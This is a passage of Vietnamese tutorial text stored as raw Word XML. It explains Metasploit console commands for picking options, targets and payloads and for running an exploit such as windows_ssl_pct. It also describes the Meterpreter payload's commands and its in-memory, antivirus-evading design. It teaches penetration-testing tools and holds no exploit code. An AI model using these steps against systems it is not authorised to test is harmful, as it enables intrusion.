    <w:p w14:paraId="2B64A9FB" w14:textId="77777777"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p>
    <w:p w14:paraId="4FD9D55A" w14:textId="02F6D30D"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show options: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xác định những options nào cần cấu hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28593FF1" w14:textId="3873DC58" w:rsidR="00074A87" w:rsidRDefault="00074A87"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set: </w:t>
      </w:r>
      <w:r w:rsidR="00D6685B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cấu hình cho những option của những module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E33BA4" w14:textId="77777777" w:rsidR="00D6685B" w:rsidRDefault="00D6685B" w:rsidP="00074A87">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD8E6AC" w14:textId="70A7199C" w:rsidR="00D6685B" w:rsidRDefault="00D6685B" w:rsidP="00074A87">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Một vài moduel có </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6685B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">những advanced options, bạn có thể xem bằng cách gõ dòng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6685B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show advanceds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E5714" w14:textId="77777777" w:rsidR="00D6685B" w:rsidRDefault="00D6685B" w:rsidP="00074A87">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AF7933" w14:textId="62C4A1E4" w:rsidR="00D6685B" w:rsidRDefault="00D6685B"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2.3. Verifi những options vừa cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C839872" w14:textId="77777777" w:rsidR="00D6685B" w:rsidRDefault="00D6685B" w:rsidP="00074A87">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7C277A" w14:textId="67E8A0C5" w:rsidR="00D6685B" w:rsidRPr="00D6685B" w:rsidRDefault="00D6685B" w:rsidP="00074A8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 xml:space="preserve">check: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kiểm tra những option đã được set chính xác chưa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4973DF2C" w14:textId="5647FE80" w:rsidR="00B2187B" w:rsidRPr="00E838B3" w:rsidRDefault="00B2187B" w:rsidP="00074A87">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AE75FF" w14:textId="2316B57E" w:rsidR="00021025" w:rsidRDefault="00D6685B"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IV.2.2.4. </w:t>
      </w:r>
      <w:r w:rsidR="00E22566">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lựa chọn targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA06386" w14:textId="2F9F6725" w:rsidR="00E22566" w:rsidRDefault="00E22566" w:rsidP="00C41F08">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>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Lựa chọn hệ điều hành nào để thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE05F2" w14:textId="6D88AE9B" w:rsidR="00E22566" w:rsidRDefault="00E22566" w:rsidP="00C41F08">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i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">show target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>những target được cung cấp bởi module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE033C9" w14:textId="0BB355EE" w:rsidR="00E22566" w:rsidRDefault="00E22566" w:rsidP="00C41F08">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i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">set: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> xác định target nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C3F2D" w14:textId="77777777" w:rsidR="00AD06E9" w:rsidRDefault="00AD06E9" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E42A825" w14:textId="77777777" w:rsidR="00AD06E9" w:rsidRPr="00AD06E9" w:rsidRDefault="00AD06E9" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E2BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">vd: smf&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD06E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">use windows_ssl_pct </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E394BDD" w14:textId="58A5072B" w:rsidR="00AD06E9" w:rsidRPr="00AD06E9" w:rsidRDefault="00AD06E9" w:rsidP="00C41F08">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="851"/>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1276"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>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D06E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">show targets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E09842" w14:textId="543DFFEE" w:rsidR="00AD06E9" w:rsidRDefault="00AD06E9" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065A2D61" w14:textId="79F455B6" w:rsidR="00E22566" w:rsidRDefault="00AD06E9" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:t>exploit sẽ liệt kê ra những tar</w:t>
      </w:r>
      <w:r w:rsidR="00C41F08">
        <w:t xml:space="preserve">get như: </w:t>
      </w:r>
      <w:r w:rsidR="00C41F08" w:rsidRPr="00C41F08">
        <w:t>winxp, winxp SP1, win2000, win2000 SP1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D8705" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F518555" w14:textId="3C1385B8" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:r>
        <w:t>IV.2.2.5. Lựa chọn payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FDBBF5" w14:textId="59DAA428" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:t>Payload là đoạn code sẽ chạy trên hệ thống remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB842E" w14:textId="36140084" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>how payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> liệt kê ra những payload của module exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646ABC5" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>info payload_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: xem thông tin chi tiết về payload đó </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038781C" w14:textId="081B633F" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>set PAYLOAD payload_name</w:t>
      </w:r>
      <w:r>
        <w:t>: xác định payload module name.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2164B852" w14:textId="3864A504" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>show advanced</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: xem những advanced options của payload đó </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB24BB" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFFD5B7" w14:textId="41E28E6C" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:r>
        <w:t>IV2.2.</w:t>
      </w:r>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Thực thi exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6A29A" w14:textId="2B7EA6A5" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>exploi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BBDCE" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0C886E" w14:textId="17CC790F" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41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2.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>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Giới thiệu payload meterpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CFDCF"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p>
    <w:p w14:paraId="44DAD88D" w14:textId="7DC005B7" w:rsid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Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object</w:t>
      </w:r>
      <w:r>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DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iện từ các phần mềm chống virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36946708"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p>
    <w:p w14:paraId="1AB264FA"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Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D896CC" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRP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Fs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: cho phép upload và download files từ các remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DF0FE" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRP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Net</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: cho phép xem thông tin mạng của remote machine như IP, route table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB314CA" w14:textId="4AA83D75" w:rsidR="00C41F08" w:rsidRP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Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>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cho phép tạo các processes mới trên remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44318564" w14:textId="77777777" w:rsidR="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">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Sy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">s: cho phép xem thông tin hệ thống của remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656F4B1E" w14:textId="77777777" w:rsidR="00D4209D" w:rsidRPr="00C41F08" w:rsidRDefault="00D4209D" w:rsidP="00C41F08">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD7187B"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câu lệnh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8FA12" w14:textId="67453781" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">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C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>use -m module1,</w:t>
      </w:r>
      <w:r w:rsidR="009613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> module2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> module3 [ -p path] [ -d</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">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Câu lệnh use dùng để load những module mở rộng của mete</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rpreter như: Fs, Net, Process.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A78B17C" w14:textId="3022ED1E" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="00C41F08" w:rsidP="00C41F08">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b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>loadlib -f library [ -t target</w:t>
      </w:r>
      <w:r w:rsidR="009613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>] [ -lde]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009613CB">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Câu lệnh cho phép load các thư viện của remote machines</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">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ab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F2578" w14:textId="23FCB11A" w:rsidR="00C41F08" w:rsidRPr="009613CB" w:rsidRDefault="00C41F08" w:rsidP="009613CB">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9613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>read channel_id [length]</w:t>
      </w:r>
      <w:r w:rsidR="00C20707">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009613CB">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Lệnh read cho phép xem dữ liêu của remote machine trên channel đang kết nối</w:t>
      </w:r>
      <w:r w:rsidR="00D4209D">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ab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BDEC58" w14:textId="25F4A38E" w:rsidR="00C41F08" w:rsidRPr="009613CB" w:rsidRDefault="00C41F08" w:rsidP="009613CB">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9613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>write channel_id</w:t>
      </w:r>
      <w:r w:rsidR="009613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>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Lệnh write cho phép ghi dữ liệu lên remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA438D" w14:textId="59F4EB88" w:rsidR="00C41F08" w:rsidRPr="00C41F08" w:rsidRDefault="009613CB" w:rsidP="009613CB">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9613CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
